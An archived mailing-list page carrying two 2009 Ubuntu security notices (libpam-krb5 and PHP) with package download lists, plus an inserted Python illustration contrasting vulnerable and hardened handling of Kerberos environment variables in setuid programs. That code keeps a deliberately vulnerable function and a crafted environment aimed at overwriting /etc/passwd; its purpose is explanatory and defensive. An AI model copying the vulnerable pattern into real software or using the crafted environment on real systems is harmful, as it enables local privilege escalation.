Message-ID: <1234466294.5854.1.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-719-1           February 12, 2009
libpam-krb5 vulnerabilities
CVE-2009-0360, CVE-2009-0361
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  libpam-krb5                     3.10-1ubuntu0.8.04.1

Ubuntu 8.10:
  libpam-krb5                     3.10-1ubuntu0.8.10.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that pam_krb5 parsed environment variables when run
with setuid applications. A local attacker could exploit this flaw to
bypass authentication checks and gain root privileges. (CVE-2009-0360)

Derek Chan discovered that pam_krb5 incorrectly handled refreshing
existing credentials when used with setuid applications. A local
attacker could exploit this to create or overwrite arbitrary files, and
possibly gain root privileges. (CVE-2009-0361)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1.diff.gz
      Size/MD5: 12322 2915d0d5b4133bcc65b6bc03346033b0
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1.dsc
      Size/MD5: 816 cbc0e2b13d48682ec29127649d9d3407
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10.orig.tar.gz
      Size/MD5: 156259 6ec6bd6637f8c91bf5386ed95fa975ba

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_amd64.deb
      Size/MD5: 78068 6f201eda9f6df9d527c165c21756084d

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_i386.deb
      Size/MD5: 77412 199ba52d9440d89f70fab1544fa90d7f

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_lpia.deb
      Size/MD5: 77246 ff9cce0bbaf03a1a348fcd1fb0ca6745

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_powerpc.deb
      Size/MD5: 80536 e3ec20dbf0fb9666549f801c012f72b0

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_sparc.deb
      Size/MD5: 77196 6e8a12a640e6c9163d65709d68c14775

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1.diff.gz
      Size/MD5: 12322 9646c596627edf91af8799f78b9bffb2
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1.dsc
      Size/MD5: 1234 39b9545e294f6937092fbf8316ffc9d1
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10.orig.tar.gz
      Size/MD5: 156259 6ec6bd6637f8c91bf5386ed95fa975ba

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_amd64.deb
      Size/MD5: 78348 9be5305e9bb4f8b85d0857230cc2acda

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_i386.deb
      Size/MD5: 77494 2e37aba551e192fffaf17754b96fee1a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_lpia.deb
      Size/MD5: 77452 d89fdc271a18c000d84a2ce6c1c1db4a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_powerpc.deb
      Size/MD5: 80632 5312557a64d26867ac5472ee56f3ac2e

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_sparc.deb
      Size/MD5: 76978 9fc7e9ee619bd7ce77fafe13a2dc46b8

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090212/ab48ee2c/attachment.bin

From marc.deslauriers at canonical.com Thu Feb 12 19:18:54 2009
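The class of bug in USN-719-1 above, as an added example that is not pam_krb5's code and not part of the advisory: a library running inside a setuid program must not act on environment variables its unprivileged invoker controls (CVE-2009-0360), and it must not let such a variable choose where a privileged credential refresh writes (CVE-2009-0361). The variable names, default paths, uids and the crafted environment are constructed; the escalation check models the uid/euid comparison and the Linux `AT_SECURE` auxiliary-vector flag.

```python
"""Why a PAM module loaded into a setuid program must not trust its environment.
Added example: the variable names, uids and default paths below are constructed,
and the logic is a generic illustration of the check, not pam_krb5's own code."""
import os
import struct
from dataclasses import dataclass, field

# Variables that redirect where Kerberos reads configuration and writes
# credential caches. Honouring them while privileged lets the unprivileged
# invoker aim a privileged config parse or file write at a path of their choosing.
ENV_CONTROLLED = ("KRB5_CONFIG", "KRB5CCNAME", "KRB5_KTNAME")
DEFAULTS = {"KRB5_CONFIG": "/etc/krb5.conf", "KRB5CCNAME": None,
            "KRB5_KTNAME": "/etc/krb5.keytab"}
AT_SECURE = 23  # Linux auxv entry type; the kernel sets it to 1 on a setuid/setgid exec


@dataclass
class ProcessContext:
    uid: int
    euid: int
    gid: int
    egid: int
    environ: dict = field(default_factory=dict)
    at_secure: bool = False


def is_privilege_escalated(ctx: ProcessContext) -> bool:
    """True when the process holds more privilege than its invoker: the
    environment (and everything else the invoker controls) is then hostile."""
    return ctx.at_secure or ctx.uid != ctx.euid or ctx.gid != ctx.egid


def krb5_settings_vulnerable(ctx: ProcessContext) -> dict:
    """The flawed pattern (CVE-2009-0360): environment overrides are applied
    no matter whose privileges the process is running with."""
    settings = dict(DEFAULTS)
    for name in ENV_CONTROLLED:
        if name in ctx.environ:
            settings[name] = ctx.environ[name]
    return settings


def krb5_settings_hardened(ctx: ProcessContext) -> dict:
    """Ignore the environment entirely while escalated and use only the
    compiled-in defaults (plus whatever the module's own config file says)."""
    if is_privilege_escalated(ctx):
        return dict(DEFAULTS)
    return krb5_settings_vulnerable(ctx)


def ccache_for_refresh(ctx: ProcessContext, pattern: str = "/tmp/krb5cc_%d") -> str:
    """Where a credential refresh (the CVE-2009-0361 code path) may write.
    While escalated only a module-chosen, uid-bound location is acceptable:
    a caller-supplied KRB5CCNAME could name any file the privileged process
    is able to create or overwrite."""
    if is_privilege_escalated(ctx):
        return pattern % ctx.uid
    return ctx.environ.get("KRB5CCNAME") or pattern % ctx.uid


def linux_at_secure() -> bool:
    """Read AT_SECURE from /proc/self/auxv (pairs of native unsigned longs).
    Returns False where /proc is unavailable, i.e. off Linux."""
    try:
        with open("/proc/self/auxv", "rb") as f:
            data = f.read()
    except OSError:
        return False
    entry = struct.Struct("LL")
    for off in range(0, len(data) - entry.size + 1, entry.size):
        key, value = entry.unpack_from(data, off)
        if key == AT_SECURE:
            return bool(value)
        if key == 0:  # AT_NULL terminates the vector
            break
    return False


def current_context() -> ProcessContext:
    return ProcessContext(os.getuid(), os.geteuid(), os.getgid(), os.getegid(),
                          dict(os.environ), linux_at_secure())


# Constructed scenario: uid 1000 invokes a setuid-root program (euid 0) with a
# crafted environment. PAM modules run inside such programs (su, for instance).
ATTACKER_ENV = {"KRB5_CONFIG": "/tmp/evil.conf", "KRB5CCNAME": "FILE:/etc/passwd"}
SETUID_CTX = ProcessContext(1000, 0, 1000, 0, ATTACKER_ENV, at_secure=True)
PLAIN_CTX = ProcessContext(1000, 1000, 1000, 1000, ATTACKER_ENV)

if __name__ == "__main__":
    print("vulnerable:", krb5_settings_vulnerable(SETUID_CTX))
    print("hardened:  ", krb5_settings_hardened(SETUID_CTX))
    print("refresh writes to:", ccache_for_refresh(SETUID_CTX))
    print("this process escalated?", is_privilege_escalated(current_context()))
```

The uid/euid comparison alone misses the case where a setuid program has already dropped to the real uid but inherited a hostile environment earlier, which is why the kernel-provided `AT_SECURE` flag (or `issetugid()` on the BSDs) is the more reliable signal; treating either condition as "escalated" is the conservative choice.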
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 12 Feb 2009 14:18:54 -0500
Subject: [Full-disclosure] [USN-720-1] PHP vulnerabilities
Message-ID: <1234466334.5854.2.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-720-1           February 12, 2009
php5 vulnerabilities
CVE-2007-3996, CVE-2007-5900, CVE-2008-3658, CVE-2008-3659,
CVE-2008-3660, CVE-2008-5557, CVE-2008-5624, CVE-2008-5625,
CVE-2008-5658
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libapache2-mod-php5             5.1.2-1ubuntu3.13
  php5-cgi                        5.1.2-1ubuntu3.13
  php5-cli                        5.1.2-1ubuntu3.13
  php5-gd                         5.1.2-1ubuntu3.13

Ubuntu 7.10:
  libapache2-mod-php5             5.2.3-1ubuntu6.5
  php5-cgi                        5.2.3-1ubuntu6.5
  php5-cli                        5.2.3-1ubuntu6.5
  php5-gd                         5.2.3-1ubuntu6.5

Ubuntu 8.04 LTS:
  libapache2-mod-php5             5.2.4-2ubuntu5.5
  php5-cgi                        5.2.4-2ubuntu5.5
  php5-cli                        5.2.4-2ubuntu5.5
  php5-gd                         5.2.4-2ubuntu5.5

Ubuntu 8.10:
  libapache2-mod-php5             5.2.6-2ubuntu4.1
  libapache2-mod-php5filter       5.2.6-2ubuntu4.1
  php5-cgi                        5.2.6-2ubuntu4.1
  php5-cli                        5.2.6-2ubuntu4.1
  php5-gd                         5.2.6-2ubuntu4.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that PHP did not properly enforce php_admin_value and
php_admin_flag restrictions in the Apache configuration file. A local
attacker could create a specially crafted PHP script that would bypass
intended security restrictions. This issue only applied to Ubuntu 6.06
LTS, 7.10, and 8.04 LTS. (CVE-2007-5900)

It was discovered that PHP did not correctly handle certain malformed
font files. If a PHP application were tricked into processing a
specially crafted font file, an attacker may be able to cause a denial
of service and possibly execute arbitrary code with application
privileges. (CVE-2008-3658)

It was discovered that PHP did not properly check the delimiter argument
to the explode function. If a script passed untrusted input to the
explode function, an attacker could cause a denial of service and
possibly execute arbitrary code with application privileges.
(CVE-2008-3659)

It was discovered that PHP, when used as a FastCGI module, did not
properly sanitize requests. By performing a request with multiple dots
preceding the extension, an attacker could cause a denial of service.
(CVE-2008-3660)

It was discovered that PHP did not properly handle Unicode conversion in
the mbstring extension. If a PHP application were tricked into
processing a specially crafted string containing an HTML entity, an
attacker could execute arbitrary code with application privileges.
(CVE-2008-5557)

It was discovered that PHP did not properly initialize the page_uid and
page_gid global variables for use by the SAPI php_getuid function. An
attacker could exploit this issue to bypass safe_mode restrictions.
(CVE-2008-5624)

It was discovered that PHP did not properly enforce error_log safe_mode
restrictions when set by php_admin_flag in the Apache configuration
file. A local attacker could create a specially crafted PHP script that
would overwrite arbitrary files. (CVE-2008-5625)

It was discovered that PHP contained a flaw in the ZipArchive::extractTo
function. If a PHP application were tricked into processing a specially
crafted zip file that had filenames containing "..", an attacker could
write arbitrary files within the filesystem. This issue only applied to
Ubuntu 7.10, 8.04 LTS, and 8.10. (CVE-2008-5658)

USN-557-1 fixed a vulnerability in the GD library. When using the GD
library, PHP did not properly handle the return codes that were added in
the security update. An attacker could exploit this issue with a
specially crafted image file and cause PHP to crash, leading to a denial
of service. This issue only applied to Ubuntu 6.06 LTS, and 7.10.
(CVE-2007-3996)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.13.diff.gz
      Size/MD5: 136172 36d74530cd6425b824aca441313ed346
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.13.dsc
      Size/MD5: 1776 02fd1bc0edafb5cbb9c79f59b731e3b2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz
      Size/MD5: 8064193 b5b6564e8c6a0d5bc1d2b4787480d792

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.2-1ubuntu3.13_all.deb
      Size/MD5: 301950 7e2ab3ef12e6da932f0ac73fd146fdf5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.13_all.deb
      Size/MD5: 1040 5a05c841f86752bfa494099af06a972d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 2434690 445924f3d8b7d220d6ad6f63bd6ca42a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 4758492 2fd749aa61a449bed58b6ef8b84015cd
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 2390194 f9e8022d83eb1cb31af82f33fd02ab77
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 136268 d59a233d6d7312d666e0e23606b197ed
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 24622 2ff8ff5729acaa80076aea734bcdee21
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 312642 6e24091ae7aaa47263da531a5a2bf166
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 36844 4974ce36d97755f9f413698b0067e156
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 22140 4c69a7739a7a79e3f0e2bcc92b6b0f06
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 8790 2d3f59432e04d90eb3ebfc1e73d00844
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 25238 3a35d3e25eec55d65576d0f6b5fca253
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 43908 052ddb2d3e0efe6fd180ae1e250288f5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 30132 409c281c95f3bf02c564c34bbc52bdae
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 44388 25607ca3ebf3e0457c20ea4c47e35f3d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 8346 8309bb41c1f195fc19b1bce8d730c6eb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 15310 da4830247685e3ebb51b02bcacd9b1d0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 29154 d1e5dcc34f2d6abfa66a2d193a10cc68
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 22706 128b3d00bf83515ae3065acb6a7e1879
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 42304 077a0218f3f0ab07f2f916b074dd6b85
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.13_amd64.deb
      Size/MD5: 16394 318a601dc2689cd98911937777009cf0

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 2263664 723113654e6f6150ae0743342ee3565e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 4475074 40d3b58e88b82ef15a1285a43512ddbf
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 2247554 cfeb30b87a9ae81bdb620b49c477fde6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 136272 d28ac7c484bacf6e1602dbeb06383da8
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 22854 32e8bb20c4e53a716a7e3e4e83a6d51a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 312652 c31d62287b548577143eb4f57275e609
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 32886 0dbc2939cc6baf2c0acac4d9dee0bb6b
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 19800 ed67bb5cbaf534e2edfb15e14de007a4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 8382 2a762be1742abac5b64df0ce65e83909
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 22000 457cd07e46978526385e1d170b8ba470
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 37376 8d5084d4542e33bba9a8d0b54fbae776
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 27042 44966bd6a45a2af4d73534afbbc9c565
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 39784 57ced673510f93bd7e5172441488ef8d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 8070 6377e700ddc7da484cd0f7ee74809e86
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 14162 b1889a9523cb80a27ac784b98e941d4d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 25604 f2ec727d74b0587ca215a97b2fcbd662
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 20546 f8335b1346f0f19011706a2b7fc3b175
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 37818 c372b6c6f9a1dd4e8d9d75335ca27cfa
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.13_i386.deb
      Size/MD5: 15140 e3d5a9b0ed6dbbc86829ef5778e7a629

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 2398262 1b8526eba895ded1a6b0f35e962912d5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 4694370 ad4bfc7788d94916767ea58ecf10bea4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 2356838 a18a229d28ead6bf651db58fe2d11855
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 136266 31ed0e8b18ac07e2c9745cbe5821434b
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 26614 3e81a2685c28d76b9cb3fbec0bc49495
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 312654 beaf8441a24716ec8b9c5ab75e7c30bb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 36610 c1b4693475b99b9c702c69edb5d32766
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 22548 d8f60015638ff78d4bad8f8704a499d8
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 10128 c5c53b698024bce46e5f1a052b57d87c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 24822 b758bc1e12c234e332e74f3b90d4565f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 41778 6a4e55f78a44668aa278ea238fa5d142
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 30082 c3987b37c875f9982359ba61a696e55e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 43422 d1819d5264159c4db98e867cc39c6464
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 9796 c8b61e0b56113051480db8ed34fdb6eb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 15946 d52234e6329fa8d4a75a95d50cba59ed
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.13_powerpc.deb
      Size/MD5: 29406 dd218657059776d7dae11e35735c1e1f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.13_